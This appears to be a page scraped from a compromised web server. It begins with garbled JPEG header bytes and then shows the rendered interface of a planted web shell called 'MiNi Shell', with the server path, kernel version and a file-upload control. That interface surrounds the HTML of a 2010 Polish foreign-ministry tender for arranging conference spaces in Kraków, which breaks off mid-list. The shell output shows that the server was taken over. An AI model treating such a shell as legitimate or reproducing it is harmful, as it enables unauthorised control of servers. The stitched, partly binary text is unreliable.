JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100524/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100524/142184-N-2010.html

<p class="kh_header"><b>Warszawa: Projekt i wykonanie aranżacji przestrzeni konferencyjnych  oraz zapewnienie obsługi w tym zakresie na Konferencji Ministrów Spraw Zagranicznych w Krakowie z okazji Obchodów 10-lecia Wspólnoty Demokracji</b><br>
<b>Numer ogłoszenia: 142184 - 2010; data zamieszczenia: 24.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Obsługi Ministerstwa Spraw Zagranicznych , Al. Szucha 23, 00-580 Warszawa, woj. mazowieckie, tel. 022 5239962, faks 022 6283363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msz.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Projekt i wykonanie aranżacji przestrzeni konferencyjnych  oraz zapewnienie obsługi w tym zakresie na Konferencji Ministrów Spraw Zagranicznych w Krakowie z okazji Obchodów 10-lecia Wspólnoty Demokracji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia jest projekt i wykonanie aranżacji przestrzeni konferencyjnych, w tym m.in. sal, holi, dziedzińców, zwanych dalej powierzchnią konferencyjną lub wydarzeń specjalnych oraz zapewnienie obsługi w tym zakresie na Konferencji Ministrów Spraw Zagranicznych w Krakowie z okazji Obchodów 10-lecia Wspólnoty Demokracji.
 Konferencja zostanie zorganizowana w Operze Krakowskiej oraz w Teatrze Słowackiego. Wydarzenia towarzyszące będą miały miejsce w Pałacu Biskupa Erazma Ciołka (dziedziniec lub sale wystawowe, Dinner Reception); na Wawelu (Dziedziniec - bankiet), na Barbakanie (VIP lunch) oraz w Teatrze Starym (Sala im. H. Modrzejewskiej, VIP Dinner). 
Montaż lub dostarczenie materiałów wizualnych w lokalizacjach wydarzeń specjalnych, w dniu ich trwania, odbywać się będzie w sposób dostosowany do wymogów przygotowań.

3.2. Cele organizacyjne Konferencji:
- aranżacja sal i dostosowanie wizualizacji do tematyki obrad;
-wzmocnienie świadomości delegatów przybyłych na Konferencję o demokracji w Polsce;
- stworzenie przyjaznych warunków pracy;
- pokazanie Polski jako kraju nowoczesnego i demokratycznego;
- promocja Polski.

Konferencja  skierowana jest do następujących grup docelowych: 
- decydentów, polityków, liderów opinii;
- przedstawicieli międzynarodowych organizacji pozarządowych; 
- przedstawicieli organizacji międzynarodowych; 
- aktywistów walczących o demokrację na świecie;
- mediów krajowych i zagranicznych (drukowanych, elektronicznych, on-line).

Wynikiem pracy Wykonawcy będzie projekt odpowiadający wymaganiom Zamawiającego   i wykonanie całościowej aranżacji sal konferencyjnych wraz z odpowiednim dostosowaniem wystroju do wizualizacji przedsięwzięcia (załącznik  nr  7 do siwz), rzut instalacji banerowej stanowiący (załącznik nr 8 do siwz), logotypów Konferencji, Wspólnoty Demokracji i Ministerstwa Spraw Zagranicznych stanowiący (załącznik nr 9 do siwz), w oparciu o plany lokalizacji spotkania (załącznik nr 10 do siwz), przy uwzględnieniu konieczności wizji lokalnej oraz zapewnieniu personelu technicznego pozwalającego na obsługę przygotowań do wydarzenia oraz w trakcie jego trwania zgodnie z dalszą częścią opisu. 

3.3. Wykonawca w ramach realizacji zamówienia przygotuje całościową koncepcję aranżacji pomieszczeń w: 
- Operze Krakowskiej, w tym: 
- -	2 sale o charakterze plenarnym, 
- -	3 sale obrad grup roboczych, 
- -         miejsc pracy dla mediów i uczestników, 
- -	holu na partnerze, antresoli,
- -	wejścia głównego,
- -	namiotu rejestracji (poza terenem opery o wym. 5m x 10m),
- -	miejsca informacyjnego (szklane pomieszczenia na parterze po lewej stronie od wejścia); 
-	Teatrze im. J. Słowackiego, w tym: 
- -	sali plenarnej, 
- -	wejścia głównego, 
- -	wejścia dla mediów,
- -	sali konferencji prasowej, 
- -	miejsca pracy dla mediów, 
- -	holu na partnerze,
- -	stanowiska informacyjnego; 
- 	Lokalizacji wydarzeń specjalnych:
--	Sal, dziedzińców.

Wykonawca zobowiązany będzie do przygotowania szczegółowego projektu rozplanowania materiałów wizualnych przestrzeni konferencyjnej. Dla każdej z sal Wykonawca zaplanować będzie musiał jego graficzne przedstawienie wraz z rozmieszczeniem tablic informacyjnych (sale obrad, miejsca do pracy, rejestracja etc.) wraz z propozycją zapewnienia przyjaznej atmosfery do pracy. Po zatwierdzeniu przez Zamawiającego szczegółowego projektu, Wykonawca zobowiązany będzie do wykonania całości aranżacji, przygotowania powierzchni konferencyjnej i wydarzeń specjalnych oraz umieszczenia logotypów na banerach promocyjnych w odpowiednich miejscach.  Do zadań Wykonawcy  będzie należał również demontaż sprzętu i materiałów po Konferencji oraz zapewnienie niezbędnej obsługi w tym zakresie. W odniesieniu do aranżacji lokalizacji wydarzeń specjalnych, Wykonawca będzie wykorzystywał w miarę możliwości zgodnie z planem spotkań te same materiały oraz sprzęt w różnych lokalizacjach. 
Wykonawca przygotuje również projekt oraz propozycję cenową produkcji pinów identyfikacyjnych z logotypem konferencji (glob - załącznik nr 8).

3.4. W SZCZEGÓŁOWY ZAKRES PRZEDMIOTU ZAMÓWIENIA WCHODZĄ:

3.4.1. USŁUGI PROJEKTOWE:

Wszystkie projekty będą na bieżąco konsultowane z Zamawiającym Wykonawca zobowiązany będzie do przyjazdów do siedziby Zamawiającego w celu omawiania                  i uzyskania akceptacji poszczególnych projektów tak często, jak będzie to konieczne dla dotrzymania terminów wykonania zamówienia.

3.4.1.1. Opracowanie szczegółowego projektu aranżacji sal Opery Krakowskiej.

Wykonawca zobowiązany będzie do opracowania szczegółowego projektu aranżacji Sali zgodnego z uwagami i sugestiami Zamawiającego. W związku z tym, że udział w Konferencji biorą delegaci wysokiego szczebla z całego świata, należy zaplanować nowoczesny                 i elegancki wystrój zgodny z wizualizacją logotypu Konferencji oraz dostosować go do miejsca jakim jest Opera Krakowska. 
Szczegółowy plan Opery, w którym będzie zorganizowana Konferencja stanowi załącznik nr 10 do siwz. Przedstawione poniżej wymiary są szacunkowe i w projekcie powinny być dostosowane do warunków poszczególnych lokalizacji.

Propozycja sal w Operze Krakowskiej powinna zakładać:

A. Sala główna - obrady dla 250 osób:
-	2 banery podwieszane o wymiarach 10m wys. x 3m szer. wraz z łącznikiem nad ekranem oraz pasem logotypów pod ekranem widocznym dla kamer TV oraz fotoreporterów posiadających stanowiska na 2 balkonie oraz linii przed sceną. Wizualizacja powinna odpowiadać wizualizacji Sali głównej w Teatrze Słowackiego;
-	6-8 foteli z 4 stolikami;
-	aranżacja kwiatowa;
-	baner wiszący przy wejściu do sali od 2,5 m wys. x 1 m. szer.
B. Sala kameralna obrady dla 1) 200 osób, 2) dla 100 osób:
-	2 banery podwieszane o wymiarach ok. 4m wys. x 1m szer. wraz z łącznikiem nad ekranem oraz pasem logotypów pod ekranem widocznym dla kamer TV oraz fotoreporterów, których stanowisko umieszczone zostaną w ostatnim rzędzie. Wizualizacja powinna odpowiadać wizualizacji Sali głównej w Teatrze Słowackiego; 
-	6-8 foteli z 4 stolikami;
-	Aranżacja kwiatowa;
-	Baner wiszący przy wejściu do sali od 2,5 m wys. x 1 m. szer.;
C. Sala prób dla 25 osób: 
-	aranżacja stołu dla 25 osób w kwadracie - obrus z logotypem Konferencji;
-	stół prezydialny dla 4 osób - wszystkie projekty powinny być takie same;
-	aranżacja kwiatowa - minimalistyczna;
-	tabliczka informacyjna;
D. Scena część centralna dla 25 osób: 
-	aranżacja stołu dla 25 osób w kwadracie - obrus z logotypem Konferencji; 
-	aranżacja kwiatowa - minimalistyczna;
-	tabliczka informacyjna;
E. Scena część boczna dla 25 osób:
-	aranżacja stołu dla 25 osób w kwadracie - obrus z logotypem Konferencji;
-	aranżacja kwiatowa - minimalistyczna;
F. Strefa pracy dla mediów i uczestników - hol na parterze dla 30 osób:
-	L-Baner informacyjny x 2 (media, uczestnicy);
G. Antresola - kącik dyskusyjny dla aktywistów x2:
-	ścianka 3 x 3m - zgodnie z wizualizacją;
-	2 x fotele + stolik;
-	ścianka do wywiadów dla mediów 3 x 3m;
-	3x banery zwieszane ok. 3x1m.;
H. Aranżacja wejścia:
-	baner informacyjny nad wejściem głównym lub obudowa kolumn wejściowych; 
-	wolnostojący baner informacyjny widoczny lub rozpięty od wejścia głównego o długości 3,5 m i wysokości 2,5 m służący jako tło do zdjęć dla wchodzących gości;
-	Aranżacje roślinne;
I. Tabliczki informacyjne: 
-	3x Working Groups Room;
-	3x First Aid;
-	2x Organisers Offices;
-	1x Security;
-	Registration;
-	Information and Accomodation;
-	inne, wynikające z projektu.

3.4.1.2.Opracowanie szczegółowego projektu aranżacji sal w Teatrze Słowackiego.

Wykonawca zobowiązany będzie do opracowania szczegółowego projektu aranżacji przestrzeni konferencyjnej zgodnego z uwagami i sugestiami Zamawiającego oraz                      w nawiązaniu do szczególnej, historycznej  architektury budynku. W związku z tym, że udział w Konferencji biorą delegaci wysokiego szczebla z całego świata, należy zaplanować elegancki wystrój zgodny z wizualizacją logotypu Konferencji oraz dostosować go do zastanej architektury wnętrz. Szczegółowy plan Teatru stanowi załącznik nr 10 do siwz.

Propozycja sal w Teatrze Słowackiego powinna zakładać:

 A. Sala główna:
-	instalacja banerowo - prezentacyjna sceny głównej zgodna z wstępnym projektem stanowiącym załącznik nr 8 do siwz o wymiarach 10m wys. x 3m szer. wraz z łącznikiem nad ekranem oraz pasem logotypów pod ekranem o wymiarze 5x4 m2 a 6x8 m2 widocznym dla kamer TV oraz fotoreporterów posiadających stanowiska na 2 balkonie oraz linii przed sceną;
-	6-8 foteli z 4 stolikami;
-	stół prezydialny, powtarzający wizualizację mównicy dla 5-6 osób (opcjonalnie);
-	aranżacja kwiatowa i aranżacja wejścia;
-	wizualizacja mównicy 1m x 0,5m z widocznymi logotypami górnej części (Wspólnota Demokracji, Ministerstwo Spraw Zagranicznych);
B. Hol główny:
-	aranżacja kwiatowa;
-	3x przestrzenna aranżacja logotypu spotkania  - logotyp 3D na postumencie (również do wykorzystania w aranżacji wydarzeń specjalnych) o wysokości wraz z postumentem do 1,5 m o proporcjonalnych wymiarach i estetyce dostosowanej do formatu wydarzenia - element opcjonalny;
C. Sala konferencji prasowej:
-	backdrop konferencyjny z logotypami o wymiarach 3x3m;
-	wizualizacja mównicy 1m x 0,5m widocznymi logotypami górnej części (Wspólnota Demokracji, Ministerstwo Spraw Zagranicznych);
-	stół prezydialny powtarzający wizualizację mównicy dla 4 osób;
-	aranżacja kwiatowa;
D. Sektor dla mediów (2 piętro):
-	2 rollupy informacyjne (sektor dla mediów);
-	ścianka konferencyjna o wymiarach 3x3m;
-	aranżacja kwiatowa;
E. Aranżacja wejścia:
-	banery informacyjne;
-	aranżacje roślinne wejścia;
F. Oznaczenie sektorów:
-	tabliczki z nazwą krajów na siedzenie wraz z mocowaniem;
-	oznaczenia sektorów siedzeń.

3.4.1.3. Harmonogram spotkań:

2 lipca 2010
Opera Krakowska
12.30-14.00 - sala Grupa Zwołująca - 25 osób
14.00 - 18.00 - trzy sale równolegle:
-	Sala prób II piętro - 25 osób;
-	Scena - część centralna - 25 osób;
-	Scena - część boczna - 25 osób.
17.30 - 19.00 - sala kameralna sesja plenarna - 60 osób

3 lipca 2010  
Opera Krakowska
9.00 - 12.00 - dwie sale:
-	Sala główna - 250 osób
-	Sala kameralna - 180 osób
12.00 - 14.00 
-	Antresola - lunch
-	Barbakan - VIP lunch 


Teatr Słowackiego
14.00 - 19.00 - dwie sale:
-	Sala główna - 600 osób
-	Sala konferencyjna - 100 osób
20.00-22.00 - wydarzenia wieczorne równolegle
-	Wawel - koncert dla uczestników - Bankiet 200 osób
-	Teatr Stary - VIP Dinner

4 lipca 2010 
Opera Krakowska 
9.00 - 12.00 - dwie sale:
-	Sala Kameralna - 60 osób
-	Sala prób - 60 osób

3.4.1.4. Opracowanie projektu elementów aranżacji wydarzeń specjalnych (Wawel - bankiet, Barbakan, Teatr Stary):
-	2x backdrop wiszący ok. 3x1m, możliwe do zawieszenia na ścianach zewnętrznych 

3.4.1.5. Opracowanie projektu wizualizacji namiotu rejestracyjnego i akredytacyjnego:
-	Powierzchnia podłogi 50 m 2, wysokość 2,5m (hala namiotowa o wymiarach 5mx10m podzielona na moduł akredytacyjny - 25m2 oraz wejście do strefy bezpieczeństwa - 25m2).

3.4.1.6.Opracowanie projektu wizualizacji stoiska informacyjnego z ladą: informacja, transport, zakwaterowanie (szklane pomieszczenie na parterze Opery Krakowskiej)
-	Oklejenie powierzchni.

3.4.1.7.Opracowanie projektu prezentacji partnerów Konferencji: 
-	W formie baneru, backdropu lub ścianki o wymiarach ok. 3x3m - sztuk 3, z czego 2 będą przenośne.

3.4.1.8.Opracowanie projektu stoiska informacyjnego na lotnisku i dworcu (pero przyjazdu pociągu z lotniska przy czym  peron opcjonalnie) - 2 stoiska:
-	W formie uwzględniającej informację na roll-up, stoliku informacyjnym dla dwóch osób obsługi. 

3.4.1.9.Przygotowanie projektu wszystkich sal konferencyjnych, wymienionych pomieszczeń i przestrzeni.  

3.4.1.10.Przygotowanie projektu pinów konferencyjnych (200 sztuk, wpinanych w klapę, widocznych z daleka).
Wykonawca przygotuje projekty wszystkich pomieszczeń, sal i przestrzeni konferencyjnych oraz elementów aranżacji. Zostaną one przedstawione do zatwierdzenia przez Zamawiającego. Pod pojęciem sal, pomieszczeń, przestrzeni konferencyjnej rozumie się przestrzeń dla delegatów, która różna charakterem spotkania powinna spełniać podstawowe zasady harmonii z wnętrzem, jak również odpowiednią kolorystyką identyfikacji wizualnej logotypu Konferencji. Wykonawca otrzyma listę sal wraz z informacjami o ich rozmiarach i ewentualnych dodatkowych wymaganiach (np. czy potrzebna jest instalacja elektryczna, multimedialna, oświetlenie, itp.). Jeśli dla danego pomieszczenia istnieją wskazówki bądź zalecenia dotyczące koncepcji jego wizualizacji, zostaną one przekazane Wykonawcy i będą musiały być przez niego uwzględnione. Wykonawca celem przygotowania rzetelnego projektu odbędzie wizytę studyjną w poszczególnych lokalizacjach.

3.4.1.11. Przygotowanie projektu ogólnego wystroju przestrzeni konferencyjnej.
Zamawiający oczekuje atrakcyjnej w formie i kolorystyce aranżacji wystroju sal konferencyjnych oraz przestrzeni z wyeksponowaniem informacji o Konferencji. Projekt aranżacji powinien uwzględniać grafikę na ewentualnych ścianach działowych o powierzchni 54m2. Zaproponowane rozwiązania graficzne mogą nawiązywać do charakteru i kolorystyki znaków konferencji. 

3.4.1.12.  Projekt i wykonanie 600 długopisów  z logotypem spotkania.


3.4.2. USŁUGI WYKONAWCZE.

3.4.2.1.  Wykonanie i montaż grafiki informacyjnej i reklamowej. 
Wykonawca wykona wszystkie potrzebne elementy graficzne i aranżacyjne zgodnie z projektem zatwierdzonym przez Zamawiającego. Wykonawca wydrukuje plan Opery i Teatru Słowackiego w odpowiedniej oprawie i formacie oraz umieści go w uzgodnionym miejscu. Wydruk planu będzie nie mniejszy niż 2m2. Wykonawca wykona całość materiałów graficznych oraz umieści je w miejscach zgodnych z projektem. Wykonawca zobowiązany będzie w miarę możliwości do wykorzystania do produkcji materiałów ekologicznych.   
Wykonawca wyprodukuje dodatkowo 20 roll-upów zgodnie z projektem załącznika nr 7 do siwz. 

3.4.2.2.Wykonanie aranżacji sal według projektu.
Wykonawca wykona pełną aranżację sal według projektu uzgodnionego i zaakceptowanego przez Zamawiającego. Wykonawca zaaranżuje wnętrze sal konferencyjnych. Wykonawca dokona montażu i ustawienia stelaży, konstrukcji czy podestów niezbędnych do zaaranżowania miejsca i umieści na nich materiały graficzne. Wykonawca wyposaży stanowiska ekspozycyjne w potrzebne instalacje (elektryczne i oświetleniowe). Wszystkie koszty związane z realizacją instalacji zawartych w projekcie poniesie Wykonawca.

3.4.2.3. Demontaż stanowisk wystawowych i wystroju Sali.
Wykonawca po zakończonej Konferencji zdemontuje wszystkie elementy ustawione w trakcie realizacji projektu, w tym stanowiska, wystrój sal i przestrzeni konferencyjnych. Wskazane przez Zamawiającego elementy zostaną przygotowane do zapakowania i transportu do siedziby Zamawiającego na koszt Wykonawcy. Pozostałe elementy wykorzystane przez Wykonawcę w celu wykonania prac (np. stelaże, konstrukcje pod eksponaty, elementy oświetlenia itp.) Wykonawca zobowiązany jest zabrać z przestrzeni konferencyjnej w dniu 4.07.2010r. od godziny 16.00. Wykonawca po zakończeniu demontażu sprzątnie całą powierzchnię wystawową.

3.4.2.4.  Aranżacje kwiatowe.
Aranżacje kwiatowe opierać się będą na materiałach wypożyczonych i składać się głównie z roślin doniczkowych. 

3.4.3. OBSŁUGA TECHNICZNA
Wykonawca zapewni obsługę techniczną potrzebną do montażu aranżacji, obsługi technicznej oraz jej demontażu.

3.5. Projekty aranżacji powierzchni konferencyjnych, w tym m.in. holu, sal obrad w Operze Krakowskiej, Teatrze Słowackiego, wraz z wizualizacją sceny sal plenarnych uwzględniający wszystkie elementy wizualizacji m.in. banery, mównicę, meble, tablice, wybrane propozycje aranżacji przestrzeni - muszą być wykonane przez Wykonawcę w minimum w trzech rzutach (na papierze, wydruk w formacie A4, w kolorze) wraz z opisem poszczególnych elementów oraz opisem proponowanych materiałów do jego wykonania. 
Projekty powinny uwzględniać wszystkie opisane wcześniej aspekty tj. właściwą ekspozycję, ustawienie specjalnej konstrukcji dostosowanej do wielkości sali. 

3.6. Projekt grafiki informacyjnej (planu) Konferencji musi uwzględniać formę prezentacji treści, schematów i rysunków, rozmieszczenie logo itp. Dodatkowo do oferty należy załączyć opis sposobu montażu, oświetlenia  i opis materiałów, z których będzie wykonana tablica i stelaż.

3.7. Wykonawca zobowiązany będzie przedstawić sprawozdanie z realizacji wszystkich prac 
do 10 lipca 2010 r. w formie raportu w wersji drukowanej i elektronicznej.

3.8. Wizję lokalną w Operze i Teatrze Słowackiego w okresie umożliwiającym przygotowanie projektu i jego realizację, Wykonawca organizuje na koszt własny.

Zamawiający nie dopuszcza możliwości składania ofert częściowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Projekt i wykonanie aranżacji przestrzeni konferencyjnych  oraz zapewnienie obsługi w tym zakresie na Konferencji Ministrów Spraw Zagranicznych w Krakowie z okazji Obchodów 10-lecia Wspólnoty Demokracji zgodnie z art.67 ust.1 pkt. 6  ustawy Pzp tj nie więcej niz 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 79.93.70.00-9, 79.93.20.00-6, 79.95.40.00-6, 79.95.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 04.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie: 6 000,00 zł (słownie:  sześć tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegajacy sie o udzielenie zamówienia musi wykazać się odpowiednim doświadczeniem w zakresie niezbędnym do wykazania spełnienia powyższego warunku  tj., w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie, a w przypadku świadczeń okresowych lub ciągłych również wykonują, co najmniej 2 usługi polegające na wykonaniu aranżacji lub kompleksowej organizacji spotkań krajowych lub międzynarodowych o wartości co najmniej 100 000,00 zł brutto każda.
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych w pkt.6.1. i 6.2. SIWZ, przy użyciu formuły SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie sprecyzował tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

